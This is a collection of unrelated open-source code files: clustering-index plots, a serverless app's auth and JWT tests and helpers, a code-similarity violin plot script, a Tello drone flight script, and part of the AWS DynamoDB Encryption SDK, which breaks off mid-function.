[1.25,1.14,1.85,0.85,0.79,0.96]]) # Cluster 1,2 y values
X = np.stack((xs.ravel(),ys.ravel()), axis=1)
# Plot data
fig1= plt.figure(1)
ax = fig1.add_subplot(111)
ax.scatter(X[:,0], X[:,1])
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_title('Points')
# Calculate C Index
cindicies_py = []
cindices_clusterSim = []
cindices_clusterCrit = []
clusters = np.arange(2,6)
for n_clusters in clusters:
# Cluster data points
cluster_labels = simple_cluster_points(X, n_clusters, clusterer='kmeans')
# Calculate Cindex for varying number of clusters ('correct' implementation)
cindex = calc_c_index(X, cluster_labels)
cindicies_py.append(cindex)
# Calculate Cindex from clusterCrit package...
res = calc_c_index_clusterCrit(X, cluster_labels)
cindex = res['c_index']
cindices_clusterCrit.append(cindex)
# Calculate Cindex from clusterSim package...
cindex = calc_c_index_clusterSim(X, cluster_labels)
cindices_clusterSim.append(cindex)
# Plot C index
fig2 = plt.figure(2)
ax = fig2.add_subplot(111)
ax.plot(clusters, cindicies_py, label='Python Implementation')
ax.plot(clusters, cindices_clusterSim, label='clusterSim Package')
ax.plot(clusters, cindices_clusterCrit, label='ClsuterCrit Package')
ax.set_xlabel('Number of clusters')
ax.set_ylabel('C Index')
ax.set_title('C Index')
ax.legend()
return None
#%% Example 2
def example_2():
import matplotlib.pyplot as plt
# Generate some data
X, labels = make_blobs(n_samples=50, n_features=2, centers=5, cluster_std=1)
# Plot data
fig1= plt.figure(1)
ax = fig1.add_subplot(111)
ax.scatter(X[:,0], X[:,1])
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_title('Points')
# Calculate C Index
cindicies_py = []
cindices_clusterSim = []
cindices_clusterCrit = []
clusters = np.arange(2,6)
for n_clusters in clusters:
# Cluster data points
cluster_labels = simple_cluster_points(X, n_clusters, clusterer='kmeans')
# Calculate Cindex for varying number of clusters ('correct' implementation)
cindex = calc_c_index(X, cluster_labels)
cindicies_py.append(cindex)
# Calculate Cindex from clusterCrit package...
res = calc_c_index_clusterCrit(X, cluster_labels)
cindex = res['c_index']
cindices_clusterCrit.append(cindex)
# Calculate Cindex from clusterSim package...
cindex = calc_c_index_clusterSim(X, cluster_labels)
cindices_clusterSim.append(cindex)
# Plot C index
fig2 = plt.figure(2)
ax = fig2.add_subplot(111)
ax.plot(clusters, cindicies_py, label='Python Implementation')
ax.plot(clusters, cindices_clusterSim, label='clusterSim Package')
ax.plot(clusters, cindices_clusterCrit, label='ClsuterCrit Package')
ax.set_xlabel('Number of clusters')
ax.set_ylabel('C Index')
ax.set_title('C Index')
ax.legend()
return None
``` |
{
"source": "johnw188/watercoolerRoulette",
"score": 3
} |
#### File: backend/lambdae/auth_test.py
```python
import lambdae.auth as auth
import lambdae.jwt_tokens as tokens
TEST_CODE = "123456"
def fake_oauth_result(code: str):
assert code == TEST_CODE
return dict(
group_id="FAKETEAMID",
user_id="FAKEUSERID",
username="FAKEUSERNAME",
teamname="FAKETEAMNAME",
url="https://fake.fake",
avatar="http://placeholder.com/192x192",
email="<EMAIL>"
)
def test_auth_slack():
result = auth.slack_oauth(
{"queryStringParameters": {"code": TEST_CODE}},
{},
slack_oauth_call=fake_oauth_result) # Mocks out the actual oauth work
assert result["statusCode"] == 302
headers = result["headers"]
assert headers["Location"] == auth.AFTER_AUTH_REDIRECT
cookie = headers["Set-Cookie"]
# This tests both that the issued cookie is valid, and that the user entry was made
tokens.require_authorization({"headers": {"Cookie": cookie}})
def test_auth_google():
result = auth.google_oauth(
{"queryStringParameters": {"code": TEST_CODE}},
{},
google_oauth_call=fake_oauth_result) # Mocks out the actual oauth work
assert result["statusCode"] == 302
headers = result["headers"]
assert headers["Location"] == auth.AFTER_AUTH_REDIRECT
cookie = headers["Set-Cookie"]
# This tests both that the issued cookie is valid, and that the user entry was made
tokens.require_authorization({"headers": {"Cookie": cookie}})
def test_error_param():
# If the oauth gets a query param of error, it indicates
# the slack oauth failed for some reason, and we should 403
def not_callable(code: str):
raise AssertionError("Unreachable")
result = auth.slack_oauth({
"queryStringParameters": {"error": "Anything"}
}, {}, slack_oauth_call=not_callable)
assert result["statusCode"] == 403
```
#### File: backend/lambdae/jwt_tokens_test.py
```python
from http import cookies
import time
import pytest
import lambdae.shared as shared
import lambdae.models as models
import lambdae.models_testlib as models_testlib
import lambdae.jwt_tokens as tokens
def test_jwt_encoding():
to_encode = {"bar": "baz"}
encoded = tokens.jwt_encode(to_encode)
decoded = tokens.jwt_decode(encoded)
assert decoded == to_encode
def test_get_jwt_cookie():
group_id = "foobarbaz"
user = models_testlib.create_fake_user(group_id)
cookie = tokens.get_jwt_cookie(user)
assert cookie.startswith("token="), cookie
auth_cookie = cookies.SimpleCookie()
auth_cookie.load(cookie)
value = auth_cookie[shared.COOKIE_ATTR_NAME].value
decoded = tokens.jwt_decode(value)
assert decoded["group_id"] == user.group_id
assert decoded["user_id"] == user.user_id
def test_require_authorization():
group_id = "foobarbaz"
user = models_testlib.create_fake_user(group_id)
user.delete()
cookie = tokens.get_jwt_cookie(user)
fake_aws_events = {"headers": {"Cookie": cookie}}
# User not saved yet, so should fail to get
with pytest.raises(shared.AuthException):
tokens.require_authorization(fake_aws_events)
user.save()
tokens.require_authorization(fake_aws_events)
def test_require_authorization_fail1():
# Non-existant
fake_aws_events = {"headers": {}}
with pytest.raises(shared.AuthException):
tokens.require_authorization(fake_aws_events)
def test_require_authorization_fail2():
# Malformed
fake_aws_events = {"headers": {"Cookie": "hella-malformed"}}
with pytest.raises(shared.AuthException):
tokens.require_authorization(fake_aws_events)
def test_require_authorization_fail3():
# invalid
fake_aws_events = {"headers": {"Cookie": "token=def_invalid"}}
with pytest.raises(shared.AuthException):
tokens.require_authorization(fake_aws_events)
def test_require_authorization_expired():
# temporal expiration
token = tokens.jwt_issue(group_id="group", user_id="user", t=time.time() - tokens.TOKEN_EXPIRY.total_seconds() - 1)
fake_aws_events = {"headers": {"Cookie": "token=" + token}}
with pytest.raises(shared.AuthException) as e:
tokens.require_authorization(fake_aws_events)
assert "Token is expired" in str(e)
```
#### File: backend/lambdae/models_testlib.py
```python
import random
import os
import lambdae.models as models
def random_hex(r: random.Random, length=6):
r = ""
for _ in range(6):
r += random.choice('0123456789abcdef')
return r
def create_fake_users(group_id: str, number: int, seed=None, prefix="fake_user_") -> [models.UsersModel]:
my_random = random.Random(seed)
users = []
for _ in range(number):
user_id = prefix + random_hex(my_random)
user = models.UsersModel(
group_id=group_id,
user_id=user_id,
username="username_" + user_id,
teamname="faketeam_" + group_id,
url="notreal.slack.com",
email="an_email_for_sure",
avatar="http://placeholder.com/192x192"
)
user.save()
users.append(user)
return tuple(users)
def create_fake_user(group_id: str):
return create_fake_users(group_id, 1)[0]
def clear_tables():
assert "IS_LOCAL" in os.environ
deleted = 0
for entry in models.UsersModel.scan():
entry.delete()
deleted += 1
for entry in models.MatchesModel.scan():
entry.delete()
deleted += 1
print("Deleted %i records" % deleted)
```
#### File: backend/lambdae/presence.py
```python
import time
import json
def endpoint(event, context):
# TODO: Update presense time here
response = {
"statusCode": 200,
"body": json.dumps({"message": str(time.time())})
}
return response
```
#### File: backend/lambdae/shared.py
```python
import datetime
import functools
import os
import json
import traceback
COOKIE_ATTR_NAME = "token"
def cookie_format(body: str, expiry: datetime.datetime):
cookie_parts = (
COOKIE_ATTR_NAME + "=" + body,
"Domain=.watercooler.express",
expiry.strftime("expires=%a, %d %b %Y %H:%M:%S GMT"),
"SameSite=None",
"Secure")
return "; ".join(cookie_parts)
def get_expired_cookie() -> str:
return cookie_format("", datetime.datetime(1970, 1, 1))
def get_env_var(name: str) -> str:
value = os.environ.get(name, None)
assert value is not None, "Expected the environment variable \"{}\" to be set.".format(name)
return value
def _fmt_exception(e: Exception) -> str:
return str(e) + "\n" + traceback.format_exc()
class AuthException(Exception):
pass
def get_header(headers: dict, keyname: str, default: str) -> str:
"""
This function deals with the inconsistent casing of http headers :(
A fine example of why we can't have nice things
"""
for k, v in headers.items():
if k.lower() == keyname.lower():
return v
return default
def json_request(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
event, context = args
print("Request to " + str(f.__name__) + ":\n" + json.dumps(event, indent=2))
request_headers = event.get("headers", {})
try:
response = f(*args, **kwargs)
except AuthException:
response = {
"statusCode": 401,
"headers": {"Set-Cookie": get_expired_cookie()},
"body": json.dumps({"ok": False, "message": "User is not logged in"})}
except Exception as e:
print("Unhandled Exception!!!")
print(_fmt_exception(e))
response = {
"statusCode": 500,
"body": json.dumps({
"ok": False,
# TODO DISABLE/Remove in prod? Idk
"message": _fmt_exception(e)
})}
# Remember to encode your bodies kids
if "body" in response:
assert type(response["body"]) == str
# Patch any headers added with the appropriate stuffs
headers = response.get("headers", {})
headers.update({
# Look at this filthy hack
"Access-Control-Allow-Origin": get_header(request_headers, "Origin", "*"),
"Access-Control-Allow-Credentials": True,
"Content-Type": "application/json"
})
response["headers"] = headers
print("Response:\n" + json.dumps(response, indent=2))
return response
return wrapper
def json_response(j: dict, code: int, ok: bool):
to_send = {"ok": ok}
to_send.update(j)
return {
"statusCode": code,
"headers": {"Content-Type": "application/json"},
"body": json.dumps(to_send)}
def json_success_response(j: dict) -> dict:
return json_response(j, 200, True)
def json_error_response(*, message: str, code: int, j: dict = {}) -> dict:
to_send = {"message": message}
to_send.update(j)
return json_response(to_send, code, False)
def json_response_from_exception(e: Exception, code: int = 500):
json_error_response(_fmt_exception(e), code)
``` |
{
"source": "johnwaldron-tcd/codemark-synoptic-visualisation-graph-generator",
"score": 3
} |
#### File: johnwaldron-tcd/codemark-synoptic-visualisation-graph-generator/plot_graphs.py
```python
import os
import numpy as np
import matplotlib.pyplot as plt
import defs
# Make sure we only use Type 1 fonts:
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
plt.rc('axes', labelsize=defs.GRAPH_LABEL_SIZE)
def read_assignment_sim_all(basename):
'''
Read the similarity data from one file and group by assignment.
So return a dict, mapping assignment to list of sim values,
for all students doing that assignment (vs all other students).
'''
inpath = os.path.join(defs.RESULTS_DIR, basename+defs.DATA_SUFFIX)
sims = {a: [] for a in defs.assignments}
with open(inpath, 'r') as fh:
for line in fh:
s1, a1, s2, a2, sim = line.strip().replace('-', ' ').split()
if a1 == a2 and s1 != s2: # Comparison within one project
sims[a1].append(int(sim))
return sims
def read_assignment_sim_max(basename):
'''
Read the similarity data from one file and group by assignment.
We want the max sim values for each student.
Return a dict, mapping assignment to list of (max) sim values.
'''
inpath = os.path.join(defs.RESULTS_DIR, basename+defs.DATA_SUFFIX)
sims = {a: {} for a in defs.assignments}
with open(inpath, 'r') as fh:
for line in fh:
s1, a1, s2, a2, sim = line.strip().replace('-', ' ').split()
if a1 == a2 and s1 != s2: # Comparison within one project
if s1 not in sims[a1]:
sims[a1][s1] = -1
sims[a1][s1] = max(sims[a1][s1], int(sim))
return {a: list(sims[a].values()) for a in defs.assignments}
# #####################################################################
# Violin Plots
# #####################################################################
def _adjacent_values(vals, q1, q3):
'''Outliers: return the bounds for +/- 1.5 times the IQR'''
upper_adjacent_value = q3 + (q3 - q1) * 1.5
upper_adjacent_value = np.clip(upper_adjacent_value, q3, vals[-1])
lower_adjacent_value = q1 - (q3 - q1) * 1.5
lower_adjacent_value = np.clip(lower_adjacent_value, vals[0], q1)
return lower_adjacent_value, upper_adjacent_value
def plot_one_violin(ax, sims, metric, proc):
'''
Violin plots showing similarities for each project.
For each violin, show dot for median, bar for the IQR (Q1 to Q3),
and whiskers for 1.5*IQR.
'''
data = [sims[a] for a in defs.assignments]
parts = ax.violinplot(data, showmeans=False, showmedians=False,
showextrema=False)
# Set the colours for the violin plots:
for pc in parts['bodies']:
pc.set_facecolor('#4f90d9')
pc.set_edgecolor('black')
pc.set_alpha(1)
# Do the quartiles:
triples = [np.percentile(d, [25, 50, 75]) for d in data]
quartile1, medians, quartile3 = [t for t in zip(*triples)]
# Print quartile data to screen, just for confirmation
whiskers = np.array([
_adjacent_values(sorted_array, q1, q3)
for sorted_array, q1, q3 in zip(data, quartile1, quartile3)])
whiskersMin, whiskersMax = whiskers[:, 0], whiskers[:, 1]
# Now draw the median, IQR and whiskers:
inds = np.arange(1, len(medians) + 1)
ax.scatter(inds, medians, marker='o', color='white', s=30, zorder=3)
ax.vlines(inds, quartile1, quartile3, color='k', linestyle='-', lw=5)
ax.vlines(inds, whiskersMin, whiskersMax, color='k', linestyle='-', lw=1)
# set style for the axes
ax.set_title('Version = \\textbf{{{}}}, '.format(proc) +
'similiarity method = \\textbf{{{}}}'.format(metric))
ax.set_xlabel('Assignments')
ax.set_xticks(range(1, 1+len(defs.assignments)))
# ax.set_xticklabels([''] + [p.replace('.v', '').replace('_', '\\_')
# for p in defs.assignments], rotation=45)
ax.set_ylabel('Percentage similarity')
ax.set_ylim(0, 100)
ax.yaxis.grid(True, linestyle='--', which='major', color='grey', alpha=.25)
def plot_assignment_sims(versus_all, save_to_file):
'''
Plot all the violin plots (all metrics/prcoesses) in a single figure.
Each subfigure has a violin plot for each assignment.
Can do all sims per assignment, or just the max sim for each student.
'''
fig, ax = plt.subplots(nrows=len(defs.ALL_METRICS),
ncols=len(defs.ALL_PROCESS),
figsize=(20, 15), sharey=True)
#fig.tight_layout()
plt.subplots_adjust(hspace=0.3)
plt.rc('axes', labelsize=defs.GRAPH_LABEL_SIZE)
for i, metric in enumerate(defs.ALL_METRICS):
for j, proc in enumerate(defs.ALL_PROCESS):
basename = metric + defs.FILENAME_SEP + proc
if versus_all:
sims = read_assignment_sim_all(basename)
else: # Only want max sim value for each student:
sims = read_assignment_sim_max(basename)
plot_one_violin(ax[i][j], sims, metric, proc)
if save_to_file:
#fig.set_size_inches(12, 6, forward=True)
basename = defs.FILENAME_SEP.join(['violin',
'all' if versus_all else 'max'])
outfile = os.path.join(defs.GRAPHS_DIR, basename + defs.GRAPHS_SUFFIX)
plt.savefig(outfile, bbox_inches='tight', pad_inches=0)
print(' Violin plots written to {}'.format(basename))
else:
plt.show()
# #####################################################################
# Silhouette Code
# #####################################################################
def read_diff_totals(basename, pnum):
'''
Read the similarity data from one file and group by point & cluster.
Here we assume: point=(assignment, student) and cluster=assignment.
For each (assignment, student), collect the total diffs per cluster.
Return an map of the difference totals, this looks like
(assignment, student) -> list-of-diffs-per-assignment
'''
# Prepare map to hold diff totals per cluster:
totals = {a: {} for a in defs.assignments}
# Now read in the data and fill up the totals array:
inpath = os.path.join(defs.RESULTS_DIR, basename+defs.DATA_SUFFIX)
with open(inpath, 'r') as fh:
for line in fh:
s1, a1, s2, a2, sim = line.strip().replace('-', ' ').split()
if s1 == s2: # always ignore self-self comparison
continue
if s1 not in totals[a1]:
totals[a1][s1] = [0] * len(defs.assignments)
# File has percent similiarity, we want difference, so:
diff = 100 - int(sim)
totals[a1][s1][pnum[a2]] += diff
return totals
def calc_assignment_silhouette(totals, pnum):
'''
Calculate the silhouette value for each point=(assignment, student).
Given totals, mapping assign x student x assign -> diff
See: https://en.wikipedia.org/wiki/Silhouette_(clustering)
Return the values in an np.array, shape = #assignments, #students
'''
attempts = defs.did_assignment()
silhouette = {p: {} for p in defs.assignments}
for a in defs.assignments:
for s in defs.students:
if s not in totals[a]: # student didn't do this assignment
continue
oth_totals = totals[a][s].copy()
# a(i) value is the average for a's cluster:
own_total = oth_totals.pop(pnum[a])
own_average = own_total / (attempts[a] - 1)
# b(i) value is min average for all other clusters:
oth_average = min([t/attempts[a] for t in oth_totals])
# s(i) = (b(i) - a(i)) / max((a(i), b(i)))
silhouette[a][s] = ((oth_average - own_average)
/ max(own_average, oth_average))
return silhouette
def print_silhouette(silhouette):
'''
Print the silhouette value for each (assignment, student) point
and then print the average silhouette value for each assignment.
'''
cluster_sil = {a: 0 for a in defs.assignments}
for a in defs.assignments:
print()
for s in defs.students:
if s in silhouette[a]:
print('\t', a, s, '%.2f' % silhouette[a][s])
pavg = sum(silhouette[a].values()) / len(silhouette[a].values())
print('=== Average for cluster {}: {:+.2f}'.format(a, pavg))
print(cluster_sil)
def calc_silhouette():
# Number the assignments and students:
num_assignments = len(defs.assignments)
pnum = dict(zip(defs.assignments, range(num_assignments)))
for metric in defs.ALL_METRICS:
for proc in defs.ALL_PROCESS:
basename = metric + defs.FILENAME_SEP + proc
totals = read_diff_totals(basename, pnum)
silhouette = calc_assignment_silhouette(totals, pnum)
print('{:15s}'.format(basename), end=' ')
for a in defs.assignments:
aavg = (sum(silhouette[a].values()) /
len(silhouette[a].values()))
print('{:+.2f}'.format(aavg), end=' ')
print()
function = 1
if __name__ == '__main__':
if function == 1: # all vs all (so 115 x 115)
plot_assignment_sims(versus_all=True, save_to_file=True)
if function == 2: # all vs max (so 115 x 1)
plot_assignment_sims(versus_all=False, save_to_file=True)
elif function == 3:
calc_silhouette()
``` |
{
"source": "johnwalicki/tello-python-examples",
"score": 3
} |
#### File: johnwalicki/tello-python-examples/example2.py
```python
from time import sleep
import tellopy
def handler(event, sender, data, **args):
drone = sender
if event is drone.EVENT_FLIGHT_DATA:
print(data)
def test():
drone = tellopy.Tello()
try:
drone.subscribe(drone.EVENT_FLIGHT_DATA, handler)
drone.connect()
drone.wait_for_connection(60.0)
drone.takeoff()
sleep(5)
drone.up(30)
sleep(1)
drone.up(0)
sleep(3)
drone.flip_forwardright()
sleep(3)
drone.forward(40)
sleep(1)
drone.forward(0)
drone.clockwise(50)
sleep(5)
drone.clockwise(0)
sleep(1)
drone.right(40)
sleep(2)
drone.right(0)
sleep(1)
drone.left(40)
sleep(2)
drone.left(0)
sleep(1)
drone.forward(30)
drone.down(20)
sleep(2)
drone.forward(0)
sleep(1)
drone.counter_clockwise(50)
sleep(5)
drone.counter_clockwise(0)
drone.land()
sleep(5)
except Exception as ex:
print(ex)
finally:
drone.quit()
if __name__ == '__main__':
test()
``` |
{
"source": "johnwalker/aws-dynamodb-encryption-python",
"score": 2
} |
#### File: dynamodb_encryption_sdk/encrypted/resource.py
```python
from functools import partial
import attr
from boto3.resources.base import ServiceResource
from boto3.resources.collection import CollectionManager
try: # Python 3.5.0 and 3.5.1 have incompatible typing modules
from typing import Optional # noqa pylint: disable=unused-import
except ImportError: # pragma: no cover
# We only actually need these imports when running the mypy checks
pass
from dynamodb_encryption_sdk.internal.utils import (
crypto_config_from_cache, decrypt_batch_get_item, encrypt_batch_write_item, TableInfoCache
)
from dynamodb_encryption_sdk.material_providers import CryptographicMaterialsProvider
from dynamodb_encryption_sdk.structures import AttributeActions
from .item import decrypt_python_item, encrypt_python_item
from .table import EncryptedTable
__all__ = ('EncryptedResource', 'EncryptedTablesCollectionManager')
@attr.s(init=False)
class EncryptedTablesCollectionManager(object):
# pylint: disable=too-few-public-methods
"""Tables collection manager that provides :class:`EncryptedTable` objects.
https://boto3.readthedocs.io/en/latest/reference/services/dynamodb.html#DynamoDB.ServiceResource.tables
:param collection: Pre-configured boto3 DynamoDB table collection manager
:type collection: boto3.resources.collection.CollectionManager
:param CryptographicMaterialsProvider materials_provider: Cryptographic materials provider to use
:param AttributeActions attribute_actions: Table-level configuration of how to encrypt/sign attributes
:param TableInfoCache table_info_cache: Local cache from which to obtain TableInfo data
"""
_collection = attr.ib(validator=attr.validators.instance_of(CollectionManager))
_materials_provider = attr.ib(validator=attr.validators.instance_of(CryptographicMaterialsProvider))
_attribute_actions = attr.ib(validator=attr.validators.instance_of(AttributeActions))
_table_info_cache = attr.ib(validator=attr.validators.instance_of(TableInfoCache))
def __init__(
self,
collection, # type: CollectionManager
materials_provider, # type: CryptographicMaterialsProvider
attribute_actions, # type: AttributeActions
table_info_cache # type: TableInfoCache
): # noqa=D107
# type: (...) -> None
# Workaround pending resolution of attrs/mypy interaction.
# https://github.com/python/mypy/issues/2088
# https://github.com/python-attrs/attrs/issues/215
self._collection = collection
self._materials_provider = materials_provider
self._attribute_actions = attribute_actions
self._table_info_cache = table_info_cache
attr.validate(self)
self.__attrs_post_init__()
def __attrs_post_init__(self):
"""Set up the translation methods."""
self.all = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
self._transform_table,
self._collection.all
)
self.filter = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
self._transform_table,
self._collection.filter
)
self.limit = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
self._transform_table,
self._collection.limit
)
self.page_size = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
self._transform_table,
self._collection.page_size
)
def __getattr__(self, name):
"""Catch any method/attribute lookups that are not defined in this class and try
to find them on the provided collection object.
:param str name: Attribute name
:returns: Result of asking the provided collection object for that attribute name
:raises AttributeError: if attribute is not found on provided collection object
"""
return getattr(self._collection, name)
def _transform_table(self, method, **kwargs):
"""Transform a Table from the underlying collection manager to an EncryptedTable.
:param method: Method on underlying collection manager to call
:type method: callable
:param **kwargs: Keyword arguments to pass to ``method``
"""
for table in method(**kwargs):
yield EncryptedTable(
table=table,
materials_provider=self._materials_provider,
table_info=self._table_info_cache.table_info(table.name),
attribute_actions=self._attribute_actions
)
@attr.s(init=False)
class EncryptedResource(object):
# pylint: disable=too-few-public-methods
"""High-level helper class to provide a familiar interface to encrypted tables.
>>> import boto3
>>> from dynamodb_encryption_sdk.encrypted.resource import EncryptedResource
>>> from dynamodb_encryption_sdk.material_providers.aws_kms import AwsKmsCryptographicMaterialsProvider
>>> resource = boto3.resource('dynamodb')
>>> aws_kms_cmp = AwsKmsCryptographicMaterialsProvider('alias/MyKmsAlias')
>>> encrypted_resource = EncryptedResource(
... resource=resource,
... materials_provider=aws_kms_cmp
... )
.. note::
This class provides a superset of the boto3 DynamoDB service resource API, so should
work as a drop-in replacement once configured.
https://boto3.readthedocs.io/en/latest/reference/services/dynamodb.html#service-resource
If you want to provide per-request cryptographic details, the ``batch_write_item``
and ``batch_get_item`` methods will also accept a ``crypto_config`` parameter, defining
a custom :class:`CryptoConfig` instance for this request.
:param resource: Pre-configured boto3 DynamoDB service resource object
:type resource: boto3.resources.base.ServiceResource
:param CryptographicMaterialsProvider materials_provider: Cryptographic materials provider to use
:param AttributeActions attribute_actions: Table-level configuration of how to encrypt/sign attributes
:param bool auto_refresh_table_indexes: Should we attempt to refresh information about table indexes?
Requires ``dynamodb:DescribeTable`` permissions on each table. (default: True)
"""
_resource = attr.ib(validator=attr.validators.instance_of(ServiceResource))
_materials_provider = attr.ib(validator=attr.validators.instance_of(CryptographicMaterialsProvider))
_attribute_actions = attr.ib(
validator=attr.validators.instance_of(AttributeActions),
default=attr.Factory(AttributeActions)
)
_auto_refresh_table_indexes = attr.ib(
validator=attr.validators.instance_of(bool),
default=True
)
def __init__(
self,
resource, # type: ServiceResource
materials_provider, # type: CryptographicMaterialsProvider
attribute_actions=None, # type: Optional[AttributeActions]
auto_refresh_table_indexes=True # type: Optional[bool]
): # noqa=D107
# type: (...) -> None
# Workaround pending resolution of attrs/mypy interaction.
# https://github.com/python/mypy/issues/2088
# https://github.com/python-attrs/attrs/issues/215
if attribute_actions is None:
attribute_actions = AttributeActions()
self._resource = resource
self._materials_provider = materials_provider
self._attribute_actions = attribute_actions
self._auto_refresh_table_indexes = auto_refresh_table_indexes
attr.validate(self)
self.__attrs_post_init__()
def __attrs_post_init__(self):
"""Set up the table info cache, encrypted tables collection manager, and translation methods."""
self._table_info_cache = TableInfoCache( # attrs confuses pylint: disable=attribute-defined-outside-init
client=self._resource.meta.client,
auto_refresh_table_indexes=self._auto_refresh_table_indexes
)
self._crypto_config = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
crypto_config_from_cache,
self._materials_provider,
self._attribute_actions,
self._table_info_cache
)
self.tables = EncryptedTablesCollectionManager( # attrs confuses pylint: disable=attribute-defined-outside-init
collection=self._resource.tables,
materials_provider=self._materials_provider,
attribute_actions=self._attribute_actions,
table_info_cache=self._table_info_cache
)
self.batch_get_item = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
decrypt_batch_get_item,
decrypt_python_item,
self._crypto_config,
self._resource.batch_get_item
)
self.batch_write_item = partial( # attrs confuses pylint: disable=attribute-defined-outside-init
encrypt_batch_write_item,
encrypt_python_item,
self._crypto_config,
self._resource.batch_write_item
)
def __getattr__(self, name):
"""Catch any method/attribute lookups that are not defined in this class and try
to find them on the provided resource object.
:param str name: Attribute name
:returns: Result of asking the provided resource object for that attribute name
:raises AttributeError: if attribute is not found on provided resource object
"""
return getattr(self._resource, name)
def Table(self, name, **kwargs):
# naming chosen to align with boto3 resource name, so pylint: disable=invalid-name
"""Creates an EncryptedTable resource.
If any of the optional configuration values are not provided, the corresponding values
for this ``EncryptedResource`` will be used.
https://boto3.readthedocs.io/en/latest/reference/services/dynamodb.html#DynamoDB.ServiceResource.Table
:param name: The table name.
:param CryptographicMaterialsProvider materials_provider: Cryptographic materials
provider to use (optional)
:param TableInfo table_info: Information about the target DynamoDB table (optional)
:param AttributeActions attribute_actions: Table-level configuration of how to encrypt/sign
attributes (optional)
"""
table_kwargs = dict(
table=self._resource.Table(name),
materials_provider=kwargs.get('materials_provider', self._materials_provider),
attribute_actions=kwargs.get('attribute_actions', self._attribute_actions),
auto_refresh_table_indexes=kwargs.get('auto_refresh_table_indexes', self._auto_refresh_table_indexes),
table_info=self._table_info_cache.table_info(name)
)
return EncryptedTable(**table_kwargs)
```
#### File: formatting/deserialize/attribute.py
```python
import codecs
from decimal import Decimal
import io
import logging
import struct
try: # Python 3.5.0 and 3.5.1 have incompatible typing modules
from typing import Callable, Dict, List, Text, Union # noqa pylint: disable=unused-import
from dynamodb_encryption_sdk.internal import dynamodb_types # noqa pylint: disable=unused-import,ungrouped-imports
except ImportError: # pragma: no cover
# We only actually need these imports when running the mypy checks
pass
from boto3.dynamodb.types import Binary
from dynamodb_encryption_sdk.exceptions import DeserializationError
from dynamodb_encryption_sdk.identifiers import LOGGER_NAME
from dynamodb_encryption_sdk.internal.formatting.deserialize import decode_byte, decode_length, decode_tag, decode_value
from dynamodb_encryption_sdk.internal.identifiers import Tag, TagValues, TEXT_ENCODING
from dynamodb_encryption_sdk.internal.str_ops import to_str
__all__ = ('deserialize_attribute',)
_LOGGER = logging.getLogger(LOGGER_NAME)
def deserialize_attribute(serialized_attribute): # noqa: C901 pylint: disable=too-many-locals
# type: (bytes) -> dynamodb_types.RAW_ATTRIBUTE
"""Deserializes serialized attributes for decryption.
:param bytes serialized_attribute: Serialized attribute bytes
:returns: Deserialized attribute
:rtype: dict
"""
def _transform_binary_value(value):
# (bytes) -> bytes
"""Transforms a serialized binary value.
:param bytes value: Raw deserialized value
:rtype: bytes
"""
if isinstance(value, Binary):
return value.value
return value
def _deserialize_binary(stream):
# type: (io.BytesIO) -> Dict[Text, bytes]
"""Deserializes a binary object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
value = decode_value(stream)
return {Tag.BINARY.dynamodb_tag: _transform_binary_value(value)}
def _transform_string_value(value):
# (bytes) -> dynamodb_types.STRING
"""Transforms a serialized string value.
:param bytes value: Raw deserialized value
:rtype: dynamodb_encryption_sdk.internal.dynamodb_types.STRING
"""
return codecs.decode(value, TEXT_ENCODING)
def _deserialize_string(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.STRING]
"""Deserializes a string object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
value = decode_value(stream)
return {Tag.STRING.dynamodb_tag: _transform_string_value(value)}
def _transform_number_value(value):
# (bytes) -> dynamodb_types.STRING
"""Transforms a serialized number value.
:param bytes value: Raw deserialized value
:rtype: dynamodb_encryption_sdk.internal.dynamodb_types.STRING
"""
raw_value = codecs.decode(value, TEXT_ENCODING)
decimal_value = Decimal(to_str(raw_value)).normalize()
return '{0:f}'.format(decimal_value)
def _deserialize_number(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.STRING]
"""Deserializes a number object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
value = decode_value(stream)
return {Tag.NUMBER.dynamodb_tag: _transform_number_value(value)}
_boolean_map = {
TagValues.FALSE.value: False,
TagValues.TRUE.value: True
}
def _deserialize_boolean(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.BOOLEAN]
"""Deserializes a boolean object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
value = decode_byte(stream)
return {Tag.BOOLEAN.dynamodb_tag: _boolean_map[value]}
def _deserialize_null(stream): # we want a consistent API but don't use stream, so pylint: disable=unused-argument
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.BOOLEAN]
"""Deserializes a null object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
return {Tag.NULL.dynamodb_tag: True}
def _deserialize_set(stream, member_transform):
# type: (io.BytesIO, Callable) -> List[Union[dynamodb_types.BINARY, dynamodb_types.STRING]]
"""Deserializes contents of serialized set.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: list
"""
member_count = decode_length(stream)
return sorted([
member_transform(decode_value(stream))
for _ in range(member_count)
])
def _deserialize_binary_set(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.SET[dynamodb_types.BINARY]]
"""Deserializes a binary set object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
return {Tag.BINARY_SET.dynamodb_tag: _deserialize_set(stream, _transform_binary_value)}
def _deserialize_string_set(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.SET[dynamodb_types.STRING]]
"""Deserializes a string set object.
:param stream: Stream containing serialized object
:type stream: io.BytesIO
:rtype: dict
"""
return {Tag.STRING_SET.dynamodb_tag: _deserialize_set(stream, _transform_string_value)}
def _deserialize_number_set(stream):
# type: (io.BytesIO) -> Dict[Text, dynamodb_types.SET[dynamodb_types.STRING]]
"""Deserializes a number set object.
